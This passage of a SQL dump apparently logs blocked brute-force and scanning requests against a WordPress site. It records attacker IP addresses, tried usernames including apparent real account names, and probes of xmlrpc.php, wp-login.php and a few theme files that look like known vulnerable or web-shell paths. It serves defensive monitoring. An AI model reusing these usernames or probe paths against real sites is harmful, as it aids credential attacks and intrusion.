,0,0,0),('209.141.57.9',3515693321,'newd',0,1664706190.7661,7,'Gpog3AvzJKjkWQ8s9r7cYlPw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1664706094.1017,152,'6YwdMLAI8bDFCksExXrizZtm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.151.6.226',1805059810,'newd',0,1664704748.1636,152,'jbNoOawg2csJynYhZAtrX5BR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664704447.0908,152,'7roJXz4LQEW92vPs1mTHGgpU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664703766.4062,152,'3r5UEaVqQNd4AL0KwsnR96OT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.79.239.127',1632628607,'admin',0,1664703408.6770,152,'EumIrxAjNHfWvYGlwe4OaXzV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.15.73',2703429449,'admin',0,1664703022.1110,152,'4C1TVO7ZUX0NgAhtzjFvIWYH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664705433.6002,152,'ugRmMQoDC1e75vBqc2WKtOZk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664705101.1879,152,'CdSQNoP3VtM9TJpmnsRIyZAc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.67.171',3270067115,'newd',0,1664709827.2179,152,'3aGLksxwWXfgyMPKUzATmv57','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1664709601.2253,152,'i5VAdewcy3xFmjs8Izfv2QWa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.42.19',2892573203,'newd',0,1664709354.2907,152,'7UY9uMweDAH68cZ3zmqlysLx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664709108.1916,152,'Jt721g5hMsrxRnBALEvOucVq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.225.94.95',601972319,'newd',0,1664708602.8797,152,'4z6WTsjZFJ9U1pMSBA8vfkYL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1664713947.1663,152,'zShd94lLp5fUwQBJZHyxtKqg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664713696.9616,51,'ZcqaBdKhYyjWNOtz5C97mFu6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.196.124.216',1539603672,'newd',0,1664713643.4818,152,'raOIHAxv73ni5cJpLNuYBXS0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.198.25.12',600185100,'newd',0,1664713339.1333,152,'KWmuZExLykOMtbn7l8giHA6o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('186.234.80.121',3135918201,'newd',0,1664713065.5223,152,'JOF5U2xVCLIkfWzqr6AGyBuK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.67.151',2813084567,'newd',0,1664712497.5222,152,'ZsFDQGBECmgS0W8XKTHnqOAr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'admin',0,1664712241.8207,152,'zL04UPHjIc7f6Dh8tAKmwE9g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.247.139.21',3120007957,'newd',0,1664717404.2945,152,'gbFm0a5eLTH4zC2qf71ryswM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1664717063.8721,152,'yUe2BQIYohdiRntPNOELxuTv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.38.184',2649106104,'newd',0,1664716432.4153,152,'U2H9iswrKJLXMIkThyR3pOfS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.146.208',860590800,'newd',0,1664716111.0986,152,'u0C1HGJzYfesjxkMprVEUiQn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664715778.3623,152,'nlRCNEdgf6WSiz27rsUupPGA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664720421.6949,152,'8b3pRaYyqSGTOdhvrVWIEsiL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664720421.6246,152,'xbtFuWa2UJjc4w3lKvr95MGS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664719768.0144,152,'YgAyiSU6d5jntVRKGWpmzc7k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1664719417.1209,152,'Zp7u6rmgMRLeIt4AD2XizbkW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.216',1364735192,'newd',0,1664724231.6330,152,'ONLRU5oyEjatm7pdsFqQHK3n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('90.156.169.12',1520216332,'newd',0,1664723018.3672,152,'U7I1ESzAZGshf436lge98Woq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.91.83.187',861623227,'newd',0,1664726826.3039,152,'KNHP2Dxuwv5AGhfTmilWI9b3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.177.20',1152889108,'newd',0,1664726424.5762,152,'XewAtLRKaBnkdxCN8USbhQMo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.71.48.115',3326554227,'newd',0,1664731767.2126,152,'s72nOJYoiZ3IPTaRqh9MjAfw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.98',3103917154,'newd',0,1664731765.6322,152,'iKpQgtU6ZcL7v8Rskz1MT35D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.55.116.248',2973201656,'newd',0,1664731760.6224,152,'2V4XwWkn5vMpGcu3Dtq9CPUx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.181.142.230',2276822758,'newd',0,1664731755.0109,152,'LqI8nvjgoWf9t3PwdscarXCG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.226.37.184',3403818424,'newd',0,1664731755.0108,152,'flhJN9GzdSakx0RvYDyVt1jU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.221.179.165',2094904229,'newd',0,1664731755.0108,152,'ONPHJK9wG5xUVBcMSo03Qvpt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.165.42.75',3114609227,'admin',0,1664730089.1959,152,'qZNdMGecjCWV1AlSy5Iv7OUQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.115.171',3098047403,'newd',0,1664762521.5089,152,'64Q9sAkPmJN1cgbZY8DWFo2U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664762518.3768,152,'tsrZXUp034kGSQd72MmVP1Yl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'newd',0,1664736628.7883,7,'025mXvVRlkarG839TIiYU4WN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.74.42',3642051114,'newd',0,1664735665.1333,152,'SL1kivR3Ch8rsJ9FBD7t4VfA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664735661.1246,152,'tWxnBA7aLsP9wCVo1MJkZRfF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.95.107',3642056555,'newd',0,1664735659.9006,152,'dJUa3u1mr0W4pqzRFwHlXkt8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.22.153.127',1410767231,'newd',0,1664735648.4733,152,'Vrwu0Px8zvdfeQNMU79mi1CB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.176.167.92',582002524,'newd',0,1664735647.5322,152,'RUxIKwWu5BiENC6smoyXVaFD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.29.50.200',773665480,'newd',0,1664735643.1422,152,'Om57EoWbLa2Acizvj3N4YwV1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.170.41.94',2997496158,'newd',0,1664735634.0076,152,'8qeKfnZBpL7OT5RQASWxY3N9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664735632.5159,152,'K9SnO60uaX3JkQqHV2PIRxW7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.224.138.16',3118500368,'newd',0,1664735623.8421,152,'btLIUvsTdjPCg6SGV2ZkXYz3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.250.202.147',3120220819,'newd',0,1664735623.8173,152,'2HxRlWenQLtZA4SEhNu8pJU3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.221.179.165',2094904229,'newd',0,1664758247.8482,152,'mnI3hwTyYAtMNiQ6efHCdsWz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('156.67.222.155',2621693595,'newd',0,1664739834.8383,152,'epCD3FUjaX05KLPNQo7WH9VY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664739831.1350,152,'7oDyRej4rhOSJTEGtuBqV8IY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.88.11',1386567691,'newd',0,1664739824.6814,152,'7NjPiD5lu1U9oWXh3QfgJTOc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.44.126',3515690110,'newd',0,1664739823.0596,7,'KwWs0Ior2dbmBnlyZcUhx6P7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.98',3103917154,'newd',0,1664739819.0338,152,'bn36Iaj1yLEpSg2qu4v57lrz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.224.36.205',400565453,'newd',0,1664739812.4249,152,'yqlr4MOuKg26eXVYhvE1nUdJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664739812.1927,152,'tKDwENI6TOLuZQlPFA5z9qsx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664739811.5036,152,'49CipGbrI36zEsL1dYck7AfW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.77.245.245',760083957,'newd',0,1664758244.0574,152,'oZpuS2hq9rxU10l6AwGLIYBg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'admin',0,1664747980.7066,152,'TtR3QcZM8FW4YBNu0Obp7Imw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.52.67.200',1093944264,'admin',0,1664747980.6133,152,'Le4IdbVQwuh12PRvnaGUrjsO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'camarco_yjghao',0,1664747977.9621,152,'ohybridFLAuOD8NV4xg16cT9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.42',3642051114,'admin',0,1664747970.8526,152,'LUQzi8lG5qEnh3YMBwstJvSr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.95.87',3642056535,'newd',0,1664745025.6153,152,'rwlApY37ioBXkLq9bF1KDQhI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.85.126',3642054014,'newd',0,1664745022.4868,152,'6dxgQjTr3pEbhnJcl1IZMPY9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.176.167.92',582002524,'newd',0,1664745017.5018,152,'QXUjPWYy4zktThsGc63eVNl0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664744999.4241,152,'3mAubEqhi6OsIK42U5JRHYDk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.115.171',3098047403,'newd',0,1664744998.8858,152,'JQrsfEuBUCh3N2mcFgeWG9XV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664744998.7149,152,'sTRudkACQ0ozaXO9E3tlDwN6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.93.3',1753439491,'newd',0,1664745014.2932,152,'BiTAe7hJnkugCwHjt3RocGWM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.124.226.192',863822528,'newd',0,1664745009.5087,152,'594zjwYMWXZvl0hSaHyUgo3x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.219.230.121',2329667193,'newd',0,1664745008.4592,152,'5Lp8UfcP6DHTwxFYOyZnj3V1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664754185.0254,152,'OkTq5BpQgD6SH8NIPa7LujUe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664754177.3046,152,'mcnQBpIPKzEULOSAvw98dq6k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.221.179.165',2094904229,'newd',0,1664754176.2295,152,'I6bLDjEthkqVPSdre1nWfZyp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('79.110.62.245',1332625141,'newd',0,1664750250.7162,152,'mOX2T8zikpdbx6L359qJfcve','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664754171.4613,152,'p7t8syXGIAH60BDTjfe2wvYl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664754171.2857,152,'MgH3V2NCFlZotdw7I5QUrmbE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664754168.5823,152,'n8TEmGP5oMWhCx9ufapXsr1Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.56.186.107',2453191275,'newd',0,1664754168.0846,152,'4Ipl5MRm0aVA6DzBZw1gYkP2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.81.4.146',3109094546,'newd',0,1664754162.7538,152,'F1WpxRPjyNMd7hDslHiTKvkG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664754162.2183,152,'NbvgkH4QzuU9cVoDJsBRfx7m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.147.218',3227751386,'newd',0,1664754159.9995,152,'p8jBnC31QGRyHx6XDPTiZAqY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1664753628.5812,51,'43w1DsCLESdgZrHByKkbpqxl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664758243.6006,152,'Cf8YNrFVtjxGoS2BLQmwcTWE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.97.183.204',392280012,'newd',0,1664758231.9449,152,'p6uP2dr9ElUgIfQjF0HbTAwX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.61.12',2487762188,'newd',0,1664758224.7387,152,'KJnxCOHwG7AIWb4rPlUXV9su','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.242.115.115',804418419,'newd',0,1664758220.8857,152,'sUgcmMeQWCaP14IGRFTl39XD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664758215.8818,152,'5I3zlOvjknRAM2d8XPrYTJCp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.119.187',2682222523,'newd',0,1664758215.8809,152,'VXCTA9tQY3mnWIs87zEbjiBO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'newd',0,1664758215.7486,152,'G3wJAxjaXd84u2gSmrfyhv16','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.136.93.169',3582483881,'admin',0,1664762362.6365,152,'v7Lthub2EiPjOmrs3eo5CZpX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.182.131.65',2478211905,'admin',0,1664762351.3002,152,'JEGRXz2SlxWnfQiV4IcOsKFA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'nathaniel-lipka',0,1664761757.6084,51,'ex2YVLiEFy3fROZnk8DB6U79','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664760543.9783,51,'E5U9R1GYZTx3DkaL0JKlFieB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.21.95.107',3642056555,'newd',0,1664762511.5003,152,'GfFJrstagQoYkS9eubxvCiOl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.197.84.101',600134757,'newd',0,1664762511.0091,152,'RL2HSGqTPXsyBkUWbpKjehVz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664762502.9487,152,'t1Wp5xhLm7NVSfnjeOKYlkB0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664762500.0301,152,'znrOu1SZlspM8qL5edXmcVbj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.121.90.150',1736006294,'newd',0,1664767584.3139,152,'cq0URHpeZiIBJwQ5bS816lPu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1664767320.8528,152,'3FGrt6Ww0XShaQvMNmqIVCfD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1664767076.4124,152,'qjRyxkJd8nbewLoGE3zfXFTc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.248.80.191',1761104063,'newd',0,1664767073.6816,152,'GWgJX3VAoS2TKdnj57zra9xI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.205.6',2703478022,'newd',0,1664766794.3268,152,'haCcy03e2d8VJzOZFgDNEKAW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664766794.3156,152,'M9RbxlY8WQVpnyiqcsEu4LXg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.20.76.220',1125403868,'newd',0,1664766302.3574,152,'ZFbYCBfInEj03OeJ9qPdmyTK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1664770247.7781,152,'DOYRGxWAiEHo1ZnIesryJSVU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.172.80.147',531386515,'newd',0,1664770240.2539,152,'SoxKd0mT1L8p5HaD9hPuqIFg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664770082.7663,55,'q8FkIi7wyNK6cPEWsJdRhGo9','','19|0|0|0|cteisys.com/wp-content/themes/photocrati-theme/admin/scripts/scripts-update.php',0,19,0),('95.111.225.89',1601167705,'newd',0,1664769932.0405,152,'fwLSPJdqH3eo2BI9kGAOX1CQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'newd',0,1664769912.9133,152,'ZgT3kvyfBLYalGcOP65Hx8oS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664769620.3825,152,'nPVlbqtKSpT8c56AY3LwkMRo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.38.44.6',908471302,'newd',0,1664773814.5177,152,'mlDP4dXOsBoLHtjG8T53eUvu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664773814.5080,152,'BFRI5idphr2GEXUYvWZazTQe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.34.104.242',52586738,'newd',0,1664773426.3727,152,'ncNPUmL7p3bGgQ8lD9SH6Bu5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664778271.9777,152,'JNYhL1k8C7XR324PcIGS6Unv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.181.142.230',2276822758,'newd',0,1664778271.9701,152,'m2EiUyX4hPg8cHtvYr5zBVaN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.235.231.20',1089201940,'newd',0,1664778081.4329,152,'yOI7RrBZLCdsif3zegF0MxVS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1664778055.0205,152,'LR9ENs2pzZkyYwbJHF5Uc3Gv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.208.67.117',2429567861,'newd',0,1664777703.8423,152,'SMDtKpxIqUgyk7XNbn20amJ6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.81.81.219',1599164891,'newd',0,1664777703.7074,152,'BO79t1AV6mDwhPFeLKZsIivl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664777330.8648,152,'wXBvsJMHKQWpyj1k0cTAbtUo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.153.50.250',2207855354,'newd',0,1664776932.9514,152,'p2cFsbw6njS1hDCmetlLdBq8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.69.250.12',575011340,'newd',0,1664781082.8644,152,'DPnb1cFKWaeSfMtYx02GNs6y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.98.152.12',1734514700,'newd',0,1664781073.1441,152,'twmVTuQGd9zIiO0orYFADP56','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1664780741.4310,152,'0Pt8qxsU7kJclrVmpZfEAz2Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'newd',0,1664785010.9377,152,'KMVyfT9v6EP0BZANXlgkJo8R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1664784992.2885,152,'x4GVeN17yr8Y3FhoXIiBsbU5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'newd',0,1664787880.0587,152,'UeMmXSWDbfza0Y9gGFZtoQsu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1664787847.3386,152,'5YQdHTk6aGxFKM7R4i9oDPhp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.122.149.171',679122347,'newd',0,1664791223.0954,152,'j6AmKHTS01gXQiLdE7UoZsbe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1664791222.4685,152,'6DTcAuPJziO2oxsenFfRCBaK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664794818.2716,152,'mrF1gQ2Mp6Ec8ok0D7hsJwdU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.207.124.111',584023151,'newd',0,1664794814.4627,152,'bZ8oxe0LiEfpdgcvF57sAkCz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.136.107.178',763915186,'newd',0,1664794812.3243,152,'oIBDLR2m0GAnbSgQuYcCp3fz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1664799134.0828,152,'dCaR8VfQwIgZ7zB5y3n40LYJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1664798699.8479,152,'d6YpAbDBmwziyhTV3vaFOLgc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.21.74',2884900170,'newd',0,1664798665.5250,152,'DEN2qf1SlHmI5eRa7ptULVni','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'nathaniel-lipka',0,1664803584.4048,51,'TQnvlsCbI15MWFJzi03XejhE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.183.122.143',3115809423,'wwwadmin',0,1664802602.2382,51,'lYybIp1onMtQd97sTu56GS8r','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.169.30.9',3198754313,'wwwadmin',0,1664802584.8740,51,'vHTI14lBQk0cWw9jpO2JN8Px','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.140',3103917196,'newd',0,1664805971.3916,152,'tJKk8RF05cnyg76QzrSPLxau','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664854497.5839,152,'kaPUmAZfI63xYts84iJbXyWF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664854498.1837,152,'W5lXZasMhcSdrYnOLIkPUV1T','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664854497.5011,152,'8AiuzpgVmjS0YWrGU7BXkyNd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'user',0,1664902469.8547,152,'LMUiTgzqYRKt69P4sF0Qd3ne','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.54.23.178',1412831154,'prueba',0,1664902468.7048,152,'PdkCiaBFeG6AYSfxclOWjwUh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.158.14.218',765333210,'nicolas',0,1664902465.6129,152,'VDxIRFJnlsh0ENUWXiY4O7TL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664902459.7052,152,'MHX1V9OuYQyDr3pRWoLmxjFS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664902454.9355,152,'2v9NOaTAMQf3oSsYGql1biWt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('182.79.46.50',3058642482,'newd',0,1664902452.3099,152,'CZNL6vEWoIcBpVRumq310HOJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.82.26',1386566170,'newd',0,1664902451.1770,152,'58zDdFV0PN6u4J9CAcS3EBwi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.61.232.79',3393054799,'newd',0,1664902451.1773,152,'hsikyHCzJbTf46AMxwp87BKo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.51.74',3328324426,'newd',0,1664901335.4275,7,'elBYKLXxmazh94MnriHgOocu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664898534.1798,152,'Y4A0b2TVqjL1pFhKEcWrePs3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.241.136',2671899016,'newd',0,1664898520.3963,152,'Cokef2QBVTEUhXmSMLxRZ3nc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.64.102',1556955238,'newd',0,1664898518.8732,152,'PcoqZCzrdh1Ak70IigLYTpDw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.136.107.178',763915186,'newd',0,1664898518.4022,152,'FyMa9ANSw3jTu1d5RVGgY68K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.126.46',2733735470,'newd',0,1664898514.9849,152,'uN17Bo4W5GFJSXOgp9xKIQ28','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.214.79.202',1440108490,'newd',0,1664898510.8567,152,'T5fAb06OnWg1uGyqJMpQXrhE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.168.95',2388502623,'newd',0,1664898507.4595,152,'LSUj6s1rYqnXcefHP5uo2bQJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664898501.9648,152,'Om6Gw7iZBqeQIXbo4MapWnAN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664898498.5113,152,'3jkDBAxLQNF4amehYOrglGv7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('4.231.48.197',82260165,'',0,1664891698.8805,55,'rxfbuSeszURhM8VEGyQgtFk4','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('4.231.48.197',82260165,'',0,1664891693.3129,55,'WLMIvt5AyG2zQxgTlC4o3au8','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/db.php',0,19,0),('188.212.34.69',3168019013,'admin',0,1664891460.8048,51,'SdunTzMPGOEXChjp8IgmqWQ6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.89.47.206',861482958,'admin',0,1664891452.8505,51,'xPuhc9nRL4Tk8UWzlYtBjqi0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664891063.0029,152,'65ih4ZW0BwVOQ9Ucl3tufrka','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664891055.2797,152,'65DhEIGOMeUaQ07X92bqWSjV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.220.174.115',3118247539,'newd',0,1664891053.